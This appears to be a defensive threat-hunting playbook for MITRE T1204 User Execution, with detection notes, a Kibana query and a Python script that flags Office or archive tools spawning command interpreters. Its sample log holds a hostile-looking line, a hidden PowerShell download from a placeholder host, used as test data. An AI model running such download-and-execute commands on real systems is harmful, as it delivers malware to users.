# T1204 User Execution

-----------------------------------------------------------------------

## Technique Description

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).

While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).

Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204). For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)

## Technique Detection

Monitor the execution of, and command-line arguments for, applications that require user interaction and that an adversary may use to gain Initial Access. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.

Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

-----------------------------------------------------------------------

### Tactics:

  * Execution

### Platforms:

  * Linux

  * Windows

  * macOS

  * IaaS

  * Containers

### Data Sources:

  * **Container:** Container Start

  * **Command:** Command Execution

  * **Instance:** Instance Creation

  * **Instance:** Instance Start

  * **File:** File Creation

  * **Network Traffic:** Network Traffic Content

  * **Process:** Process Creation

  * **Application Log:** Application Log Content

  * **Container:** Container Creation

  * **Network Traffic:** Network Connection Creation

  * **Image:** Image Creation

-----------------------------------------------------------------------

### Adversarial usage:

| Adversary Group |  Adversarial Usage |
|----|----|

-----------------------------------------------------------------------

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1204)

  * [Telephone Attack Delivery](https://www.proofpoint.com/us/blog/threat-insight/caught-beneath-landline-411-telephone-oriented-attack-delivery), Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November 4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery. Retrieved January 5, 2022.

> *Note: Do not edit this cell with information you want to keep. This cell will be wiped when the update script is run. Store permanent information in one of the relevant cells below.*

*Last pulled from Mitre on: 23 June 2022*



-----------------------------------------------------------------------

## Metadata

  * **Last Updated Date:** 22 July 2021

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres, Taylor Booth

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- N/A

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| Example APT/Threat actor | 1, 2 | 2, 3, 5|

## Detection Blindspots

- Sensor Location

## Analytical References

  * [T1140 - Deobfuscate/Decode Files](http://10.24.35.157/lab/workspaces/auto-b/tree/playbooks/Enterprise/Defense%20Evasion/T1140%20Deobfuscate%20Decode%20Files%20Or%20Information.ipynb)

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Monitor the execution of, and command-line arguments for, applications that require user interaction and that an adversary may use to gain Initial Access. This includes compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads.

- Anti-virus can potentially detect malicious documents and files that are downloaded and executed on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning powershell.exe).

- Compression applications, such as those for zip files, that can be used to Deobfuscate/Decode Files or Information in payloads may also be used with this TTP. See [T1140 - Deobfuscate/Decode Files or Information](http://10.24.35.157/lab/workspaces/auto-b/tree/playbooks/Enterprise/Defense%20Evasion/T1140%20Deobfuscate%20Decode%20Files%20Or%20Information.ipynb) for more possible analytics.

#### Analytic 1

  * **Information:** Monitor process creation and command-line arguments for applications that require user interaction and that an adversary may use to gain Initial Access.

  * **Source:** Winlogbeat, Sysmon

  * **Tool:** Kibana

  * **Notes:** Noisy search: use strict time constraints. Event 4688 only carries `CommandLine` when the "Include command line in process creation events" audit policy is enabled. Wildcards inside quoted strings are matched literally by both KQL and Lucene syntax, so the patterns below are left unquoted.

  * **Query:** ```event.code:4688 AND winlog.event_data.CommandLine:(*cmd.exe* OR *powershell.exe*)```
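As an added example (not MITRE text or the playbook's own analytic), the following Python runs the parent/child check described in the hunter notes over constructed process-creation records: it flags a user-facing application (Office, PDF reader, archive tool) spawning a command interpreter, the follow-on behaviour a lure document or a script inside a zip produces. It assumes the ECS field names that Winlogbeat and the Sysmon module emit (`process.executable`, `process.parent.executable`, `process.command_line`); the sample records are constructed, not real telemetry.

```python
import json
from typing import Optional

# Applications a user opens a lure in; archive tools cover the zip / T1140 case.
USER_FACING_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                       "acrord32.exe", "acrobat.exe", "7zfm.exe", "winrar.exe"}
# Interpreters a lure typically hands off to.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyse_event(event: dict) -> Optional[dict]:
    """Return a finding for one ECS process-creation event, or None if it looks benign."""
    if str(event.get("event", {}).get("code", "")) not in ("4688", "1"):  # Security 4688 / Sysmon 1
        return None
    proc = event.get("process", {})
    parent = _basename(proc.get("parent", {}).get("executable", ""))
    child = _basename(proc.get("executable", ""))
    if parent not in USER_FACING_PARENTS or child not in SUSPICIOUS_CHILDREN:
        return None
    cmdline = proc.get("command_line", "")
    return {"host": event.get("host", {}).get("name", "?"), "parent": parent, "child": child,
            # A URL in the command line matches the "reaching out to the internet" case.
            "downloads": "http" in cmdline.lower(), "command_line": cmdline}


def hunt(lines) -> list:
    """Run analyse_event over newline-delimited JSON records, skipping unparsable lines."""
    findings = []
    for line in lines:
        try:
            finding = analyse_event(json.loads(line))
        except json.JSONDecodeError:
            continue
        if finding:
            findings.append(finding)
    return findings


# Constructed sample records (not real telemetry): benign logon shell, Word spawning PowerShell,
# and a script run straight out of an archive opened in 7-Zip.
SAMPLE_LOG = [
    '{"event":{"code":"4688"},"host":{"name":"WS01"},"process":{"executable":"C:\\\\Windows\\\\explorer.exe","parent":{"executable":"C:\\\\Windows\\\\System32\\\\userinit.exe"},"command_line":"explorer.exe"}}',
    '{"event":{"code":"4688"},"host":{"name":"WS01"},"process":{"executable":"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe","parent":{"executable":"C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Office16\\\\WINWORD.EXE"},"command_line":"powershell.exe -w hidden -c \\"iwr http://example.invalid/p\\""}}',
    '{"event":{"code":1},"host":{"name":"WS02"},"process":{"executable":"C:\\\\Windows\\\\System32\\\\wscript.exe","parent":{"executable":"C:\\\\Program Files\\\\7-Zip\\\\7zFM.exe"},"command_line":"wscript.exe C:\\\\Users\\\\bob\\\\AppData\\\\Local\\\\Temp\\\\invoice.js"}}',
]
```

Calling `hunt(SAMPLE_LOG)` returns two findings (the Word and 7-Zip parents); the first has `downloads` set because its command line contains a URL.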



-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

